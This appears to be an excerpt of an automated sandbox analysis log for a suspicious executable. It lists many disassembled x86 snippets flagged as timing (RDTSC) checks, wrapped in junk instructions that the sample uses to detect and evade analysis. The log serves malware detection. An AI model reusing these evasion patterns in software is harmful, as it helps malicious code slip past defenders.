Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BEE49 second address: 12BEE55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F99150F94F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BEE55 second address: 12BEE84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F99146B45B1h 0x0000000b jnp 00007F99146B45ADh 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BEC89 second address: 12BEC8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BEC8D second address: 12BECAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99146B45A9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BECAC second address: 12BECC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99150F94FBh 0x00000007 jnp 00007F99150F94FCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BECC1 second address: 12BECD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F99146B459Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BECD5 second address: 12BECDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BECDB second address: 12BECFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B45A0h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F99146B459Ah 0x0000000e jo 00007F99146B4596h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12BECFF second address: 12BED05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C409E second address: 12C40AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C3D69 second address: 12C3D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C3D6E second address: 12C3D76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C6359 second address: 12C635D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12C635D second address: 12C6363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DD7E4 second address: 12DD7EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DD7EA second address: 12DD801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F99146B4596h 0x0000000c popad 0x0000000d jmp 00007F99146B459Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DDE31 second address: 12DDE37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DDE37 second address: 12DDE4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007F99146B45A1h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DFDCF second address: 12DFDD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DFDD3 second address: 12DFDDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12DFDDB second address: 12DFDFF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F99150F9508h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E273E second address: 12E2742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E28E4 second address: 12E28EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E28EC second address: 12E28F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E28F8 second address: 12E28FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12E2C89 second address: 12E2CFA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F99146B45AAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F99146B45A2h 0x00000012 push dword ptr [ebp+122D36CEh] 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F99146B4598h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 mov dword ptr [ebp+122D32FBh], eax 0x00000038 push 8C415FAEh 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F99146B459Bh 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54D0E35 second address: 54D0E52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 3E50D33Ah 0x00000008 call 00007F99150F94FBh 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 mov ch, BBh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54D0E52 second address: 54D0F24 instructions: 0x00000000 rdtsc 0x00000002 mov cl, dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushfd 0x00000008 jmp 00007F99146B459Fh 0x0000000d xor cl, 0000003Eh 0x00000010 jmp 00007F99146B45A9h 0x00000015 popfd 0x00000016 pop esi 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a pushad 0x0000001b mov bx, CD9Eh 0x0000001f call 00007F99146B459Fh 0x00000024 pop ecx 0x00000025 popad 0x00000026 pushfd 0x00000027 jmp 00007F99146B45A9h 0x0000002c xor al, FFFFFFD6h 0x0000002f jmp 00007F99146B45A1h 0x00000034 popfd 0x00000035 popad 0x00000036 mov ebp, esp 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007F99146B459Ch 0x0000003f add cx, 71F8h 0x00000044 jmp 00007F99146B459Bh 0x00000049 popfd 0x0000004a jmp 00007F99146B45A8h 0x0000004f popad 0x00000050 pop ebp 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F99146B45A7h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0F9E second address: 54C0FB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99150F9504h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A00C1 second address: 54A00DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B45A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A017B second address: 54A0181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0181 second address: 54A0185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0CCD second address: 54C0CD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0CD3 second address: 54C0D09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B459Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F99146B459Bh 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F99146B45A5h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0901 second address: 54C0905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0905 second address: 54C090B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C090B second address: 54C0911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0911 second address: 54C0915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500EFE second address: 5500F4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99150F94FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F99150F9500h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ebx, esi 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007F99150F9506h 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F99150F94FAh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500F4B second address: 5500F51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500F51 second address: 5500F85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99150F94FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007F99150F94FCh 0x00000013 adc cx, 2B08h 0x00000018 jmp 00007F99150F94FBh 0x0000001d popfd 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0212 second address: 54E0244 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B45A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov edi, ecx 0x0000000d call 00007F99146B459Ah 0x00000012 mov dx, si 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0244 second address: 54E0248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0248 second address: 54E024C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E024C second address: 54E0252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0252 second address: 54E029C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B45A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ecx, 0C2FE8BDh 0x00000010 pushfd 0x00000011 jmp 00007F99146B459Ah 0x00000016 jmp 00007F99146B45A5h 0x0000001b popfd 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov edx, 35E0895Eh 0x00000027 mov eax, ebx 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E029C second address: 54E02DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 pushfd 0x00000006 jmp 00007F99150F94FAh 0x0000000b xor si, C228h 0x00000010 jmp 00007F99150F94FBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr [ebp+08h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F99150F9505h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E02DA second address: 54E02FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B45A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ah, bl 0x00000011 movzx ecx, dx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E02FB second address: 54E0301 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0301 second address: 54E033C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B45A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and dword ptr [eax+04h], 00000000h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F99146B45A7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0805 second address: 54C0835 instructions: 0x00000000 rdtsc 0x00000002 call 00007F99150F9508h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov si, bx 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 mov di, cx 0x00000013 mov bh, ch 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0835 second address: 54C0839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0839 second address: 54C083F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C083F second address: 54C0845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0845 second address: 54C0849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0849 second address: 54C084D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C084D second address: 54C0882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F99150F9503h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F99150F9505h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0882 second address: 54C0892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99146B459Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0008 second address: 54E0016 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99150F94FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0016 second address: 54E004D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B459Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F99146B45A6h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F99146B459Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E004D second address: 54E0074 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F99150F9505h 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0074 second address: 54E00B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov bl, 30h 0x00000007 popad 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov di, A12Ch 0x00000010 pushfd 0x00000011 jmp 00007F99146B45A5h 0x00000016 sub ch, 00000006h 0x00000019 jmp 00007F99146B45A1h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E00B0 second address: 54E00B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 550065C second address: 5500672 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B459Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500672 second address: 5500678 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500678 second address: 550067E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 550067E second address: 5500682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500682 second address: 55006BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B45A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F99146B45A0h 0x00000012 xchg eax, ecx 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 pop ebx 0x00000017 mov cx, 63EFh 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55006BB second address: 55006CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ah, E1h 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55006CA second address: 55006D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B459Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55006D9 second address: 55006FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99150F9509h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55006FD second address: 5500701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500701 second address: 5500707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500707 second address: 5500730 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B45A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [76FA65FCh] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov edx, 103CE8F0h 0x00000016 mov edx, 379FA41Ch 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500730 second address: 5500736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500736 second address: 550073A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 550073A second address: 5500774 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov eax, edi 0x0000000f pushfd 0x00000010 jmp 00007F99150F9501h 0x00000015 adc ecx, 53961926h 0x0000001b jmp 00007F99150F9501h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500774 second address: 550077A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 550077A second address: 550077E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 550077E second address: 55007B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F99860D7776h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007F99146B459Bh 0x00000017 sbb ah, 0000005Eh 0x0000001a jmp 00007F99146B45A9h 0x0000001f popfd 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55007B8 second address: 5500841 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 16F76527h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F99150F94FCh 0x0000000f add cx, 6058h 0x00000014 jmp 00007F99150F94FBh 0x00000019 popfd 0x0000001a popad 0x0000001b mov ecx, eax 0x0000001d jmp 00007F99150F9506h 0x00000022 xor eax, dword ptr [ebp+08h] 0x00000025 pushad 0x00000026 push ebx 0x00000027 pop edx 0x00000028 pushfd 0x00000029 jmp 00007F99150F9506h 0x0000002e adc si, 2518h 0x00000033 jmp 00007F99150F94FBh 0x00000038 popfd 0x00000039 popad 0x0000003a and ecx, 1Fh 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F99150F9505h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500922 second address: 5500968 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F99146B45A8h 0x00000008 sub ah, FFFFFFE8h 0x0000000b jmp 00007F99146B459Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 call 00007F99146B45A8h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B0021 second address: 54B0027 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B0027 second address: 54B002D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B002D second address: 54B0031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B0031 second address: 54B004E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F99146B45A2h 0x00000010 rdtsc
